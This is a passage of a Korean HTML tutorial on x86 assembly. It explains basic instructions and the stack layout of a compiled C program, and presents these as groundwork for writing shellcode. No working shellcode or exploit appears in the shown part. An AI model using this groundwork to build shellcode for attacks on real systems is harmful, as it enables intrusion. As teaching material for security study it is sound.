style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" decl %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>decl %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax\uc5d0 1\uc744 \uac10\uc18c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0 1\uc744 \uac10\uc18c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax-- \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax--<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" lea \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>lea<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>leal 0x8(%esi),%eax<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax\uc5d0<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN>esi+8\uc8fc\uc18c\ub97c \ub123\uc5b4\ub77c.<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" eax = esi + 8 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>eax = esi + 8<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" xor \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>xor<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" xor %eax, %eax \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>xor %eax, %eax<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\ub458\uc744 \ube44\uad50\ud574\uc11c \uac19\uc73c\uba74 0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" if(a==b) b=0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>if(a==b) b=0<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" jmp \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>jmp<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" jmp string \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>jmp string<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" 0x1f\uc704\uce58\ub85c jump\ud558\ub77c. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x1f\uc704\uce58\ub85c jump\ud558\ub77c.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" goto string \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>goto string<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" call \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>call<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" call star \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>call star<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568. \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uc11c\ube0c\ub8e8\ud2f4\uc744 call \ud568.<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" star() \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>star()<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" ret \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ret \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ret<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uc11c\ube0c\ub8e8\ud2f4\uc5d0\uc11c \uc6d0\ub798\ub85c \ubcf5\uadc0<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" return \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>return<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" int \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>int<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" int $0x80 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>int $0x80<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>system call \uc704\ud55c \uc778\ud130\ub7fd\ud2b8<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" push \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>push<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" push %ebp \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>push %ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\" pop \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>pop<SPAN style=\"mso-spacerun: yes\">&nbsp; <\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" pop %esi \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>pop %esi<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>stack\uc5d0\uc11c \uaebc\ub0b4 esi\uc5d0 \uc800\uc7a5<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" - \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>-<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <\/SPAN><\/FONT><\/TD><\/TR><\/TBODY><\/TABLE>\n\n<P><br \/><br \/>\uc774\uc678\uc5d0\ub3c4 \ub9ce\uc740 \uba85\ub839\uc5b4\ub4e4\uc774 \uc788\uc73c\ub098 \uc704\uc758 \uae30\ubcf8\uc801\uc778 \uba85\ub839\uc5b4\ub4e4\ub9cc \ucda9\ubd84\uc774 \uc774\ud574\ud55c\ub2e4\uba74 shellcode\ub97c \ub9cc\ub4dc <br \/>\ub294\ub370 \ud070 \ubb38\uc81c\uac00 \uc5c6\uc744 \uac83\uc774\ub2e4.&nbsp; <br \/><br \/>&lt;\uc5b4\uc148\ube14\ub9ac \ud504\ub85c\uadf8\ub7a8 \uc774\ud574&gt; <br \/>\uc9c0\uae08\uae4c\uc9c0 \uba87\uac1c\uc758 \ub808\uc9c0\uc2a4\ud130\uc758 \uc774\ub984\uacfc \uac04\ub2e8\ud55c \uc5b4\uc0d8\ube14\ub9ac \uba85\ub839\uc5b4\uc5d0 \ub300\ud558\uc5ec \uc54c\uc544\ubcf4\uc558\ub2e4. \uc774\uc81c Linux\uc5d0\uc11c&nbsp; <br \/>\uc0ac\uc6a9\ub418\ub294 \uc5b4\uc148\ube14\ub9ac\uc758 \uad6c\uc870\ub97c \uc54c\uc544\ubcf4\uae30 \uc704\ud558\uc5ec \uac04\ub2e8\ud55c C\uc5b8\uc5b4 \ud504\ub85c\uadf8\ub7a8\uc744 \ub9cc\ub4e4\uc5b4\uc11c \uc5b4\uc148\ube14\ub9ac\uc5b8\uc5b4\ub85c&nbsp; <br \/>\ucef4\ud37c\uc77c \ud574\ubcf4\uc790. \uc6b0\ub9ac\ub294 \ud504\ub85c\uadf8\ub7a8 \ub0b4\uc5d0\uc11c \uc2a4\ud14d\uc5d0 data\uac00 \uc5b4\ub5bb\uac8c \uc313\uc774\uace0 \ucc98\ub9ac\ub418\ub294\uc9c0 esp\uc640 ebp\uc758&nbsp; <br \/>\ubcc0\ud654\ub97c \ud1b5\ud558\uc5ec \uc54c\uc544 \ubcfc\ub824\uace0 \ud55c\ub2e4. <br \/><br \/>[willy@Null2Root]$ cat test11.c <br \/>main() <br \/>{ <br \/>&nbsp; int a=1; <br \/>&nbsp; printf(\" a is %d \\n\",a); <br \/>} <br \/><br \/>a\ub97c \ubcc0\uc218\ub85c \uc815\uc758\ud55c\ub4a4 a\uc5d0 1\uc744 \ub123\uace0 \ucd9c\ub825\ud558\ub77c\ub294 \uac04\ub2e8\ud55c \ud504\ub85c\uc774\ub2e4. <br \/><br \/>[willy@Null2Root]$ gcc test11.c -S -o test11.s -mpreferred-stack-boundary=2 <br \/><br \/>\uc5ec\uae30\uc11c -mpreferred-stack-boundary=2 \uc635\uc158\uc744 \uc0ac\uc6a9\ud55c \uc774\uc720\ub294 gcc 2.95\uc774\uc0c1\uc758 \ubc84\uc804\uc5d0\uc11c stack\uc758 \uad6c\uc870\uac00 <br \/>\uc77c\ubd80 \ubcc0\uacbd\ub418\uc5b4 \uc608\uc804\uc758 stack\uad6c\uc870\ub97c \uc0ac\uc6a9\ud558\uae30 \uc704\ud574\uc11c \ucd94\uac00\ud558\uc600\uc73c\uba70, -S \uc635\uc158\uc740 \uc5b4\uc148\ube14\ub9ac\ub85c \ucef4\ud37c\uc77c\ud558\ub294 <br \/>\uc635\uc158\uc774\ub2e4. <br \/><br \/>[willy@Null2Root]$ cat test11.s <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .file &nbsp; \"test1.c\" <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .version &nbsp; &nbsp; &nbsp;&nbsp; \"01.01\" <br \/>gcc2_compiled.: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; .section &nbsp; &nbsp; &nbsp;&nbsp; .rodata <br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \" a is %d \\n\" <br \/>.text <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .align 4 <br \/>.globl main <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .type &nbsp;&nbsp; main,@function <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $4, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/>.Lfe1: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .size &nbsp;&nbsp; main,.Lfe1-main <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .ident&nbsp; \"GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.0)\" <br \/>&nbsp;&nbsp; <br \/>\uc774\uc640\uac19\uc774 \uc870\uae08 \ubcf5\uc7a1\ud55c \uad6c\uc870\ub85c \ub418\uc5c8\uc788\ub2e4. \uc5ec\uae30\uc11c \uc9c1\uc811\uc801\uc73c\ub85c \ud504\ub85c\uadf8\ub7a8\uc2e4\ud589\uacfc \uad00\uacc4\uac00 \uc5c6\ub294 \ubd80\ubd84\ub4e4\uc744&nbsp; <br \/>\uc81c\uac70\ud558\uba74 \uc544\ub798\uc640 \uac19\uc740 \uac04\ub2e8\ud55c \uad6c\uc870\ub85c \ub9cc\ub4e4\uc218 \uc788\ub2e4. <br \/><br \/>.LC0: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; .string \" a is %d \\n\" <br \/>.globl main <br \/>main: <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; %esp, %ebp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; subl &nbsp;&nbsp; $4, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; movl &nbsp;&nbsp; $1, -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; -4(%ebp) <br \/>&nbsp; &nbsp; &nbsp; &nbsp; pushl &nbsp; $.LC0 <br \/>&nbsp; &nbsp; &nbsp; &nbsp; call &nbsp;&nbsp; printf <br \/>&nbsp; &nbsp; &nbsp; &nbsp; addl &nbsp;&nbsp; $8, %esp <br \/>&nbsp; &nbsp; &nbsp; &nbsp; leave <br \/>&nbsp; &nbsp; &nbsp; &nbsp; ret <br \/><br \/>\uc5ec\uae30\uc11c .LC0: \uc640 main:\uc740 \ub77c\ubca8\uc774\uba70 .globl main \ubd80\ubd84\uc740 main\uc744 \ud568\uc218\ub85c \uc815\uc758\ud558\ub294 \ubd80\ubd84\uc774\ub2e4. \uadf8\ub9ac\uace0&nbsp; <br \/>main: \ub0b4\uc5d0\uc11c\uc758 \ud504\ub85c\uadf8\ub7a8\uc744 \ubcf4\uba74 \uc544\ub798\uc640 \uac19\ub2e4.. \ud2b9\ud788 %esp\uc640 %ebp\uc5d0 \ub300\ud558\uc5ec \uc720\uc758\ud574\uc11c \uad00\ucc30\ud574\ubcfc&nbsp; <br \/>\ud544\uc694\uac00 \uc788\ub2e4. \uc5ec\uae30\uc11c \ubcf4\uc5ec\uc8fc\ub294 esp &amp; ebp\uac12\uc740 \uc0c1\ub300\uac12\uc774\ub2e4. <br \/><br \/><\/P>\n\n<TABLE style=\"WIDTH: 403pt; BORDER-COLLAPSE: collapse\" border=0 cellSpacing=0 cellPadding=0 width=536 x:str>\n<COLGROUP>\n<COL style=\"WIDTH: 107pt; mso-width-source: userset; mso-width-alt: 4039\" width=142>\n<COL style=\"WIDTH: 40pt; mso-width-source: userset; mso-width-alt: 1507\" span=2 width=53>\n<COL style=\"WIDTH: 216pt; mso-width-source: userset; mso-width-alt: 8192\" width=288>\n<TBODY>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: silver; WIDTH: 107pt; HEIGHT: 13.5pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 height=18 width=142><FONT size=2><STRONG>\uba85<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; <\/SPAN>\ub839<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 40pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=53><FONT size=2><STRONG>%esp<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 40pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=53><FONT size=2><STRONG>%ebp<\/STRONG><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: silver; WIDTH: 216pt; BORDER-TOP: windowtext 0.5pt solid; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl25 width=288><STRONG><FONT size=2>\uc124<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; <\/SPAN>\uba85<\/FONT><\/STRONG><\/TD><\/TR>\n<TR style=\"HEIGHT: 13.5pt\" height=18>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext 0.5pt solid; BACKGROUND-COLOR: transparent; HEIGHT: 13.5pt; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 height=18 x:str=\"pushl %ebp \"><FONT size=2>pushl<SPAN style=\"mso-spacerun: yes\">&nbsp;&nbsp; <\/SPAN>%ebp<SPAN style=\"mso-spacerun: yes\">&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>0x00<\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" old \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>old<SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN><\/FONT><\/TD>\n<TD style=\"BORDER-BOTTOM: windowtext 0.5pt solid; BORDER-LEFT: windowtext; BACKGROUND-COLOR: transparent; BORDER-TOP: windowtext; BORDER-RIGHT: windowtext 0.5pt solid\" class=xl24 x:str=\" \uae30\uc874 ebp\uac12\uc744 stack\uc5d0 \uc800\uc7a5\ud568. ret\uc2dc \ud658\uc6d0\uc704\ud568 \"><FONT size=2><SPAN style=\"mso-spacerun: yes\">&nbsp;<\/SPAN>\uae30\uc874 ebp\uac12\uc744 